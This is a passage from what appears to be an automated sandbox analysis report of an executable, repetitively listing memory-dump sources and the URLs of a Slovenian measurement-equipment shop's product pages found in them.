                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/o320-3003-180-500-m-temperaturno-tipalo-termoelement-tc-oplascen-s-prik
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/sl-2001-validacijski-set-ebro/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/v400-7022-temperaturno-tipalo-uporovno-rtd-vticno-s-prikljucnim-kablom-
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/analizato
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/aplikacij
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/kamere-en
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/merilnik-
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/potrosni-
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/arhiv/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/datalog
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/dodatna
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/lastnov
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/merilni
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/monitor
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 